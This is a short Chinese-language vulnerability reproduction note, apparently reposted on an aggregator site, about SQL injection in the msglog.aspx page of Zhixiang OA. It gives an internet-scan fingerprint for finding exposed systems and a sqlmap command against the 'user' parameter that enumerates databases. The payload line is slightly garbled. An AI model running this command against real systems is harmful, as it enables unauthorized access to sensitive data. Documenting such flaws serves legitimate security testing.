前言：致翔OA產品漏洞復現筆記，供自己使用，不定期更新
聲明：本人所有文章均為技術分享，請勿非法用于其他用途，否則后果自負。

漏洞列表：
致翔OA msglog.aspx SQL注入漏洞

致翔OA msglog.aspx SQL注入漏洞

漏洞描述
致翔OA msglog.aspx文件存在SQL注入漏洞，攻擊者通過漏洞可獲取敏感信息

漏洞影響
致翔OA

網絡測繪

app="致翔軟件-致翔OA"

漏洞復現
存在注入的參數是user
poyload：

/mainpage/msglog.aspx?user=1 py -3 sqlmap.py -u "http://xx.xx.xx/mainpage/msglog.aspx?user=1" -p user --dbs --random-agent

總結

以上是生活随笔為你收集整理的致翔OA漏洞复现手册的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。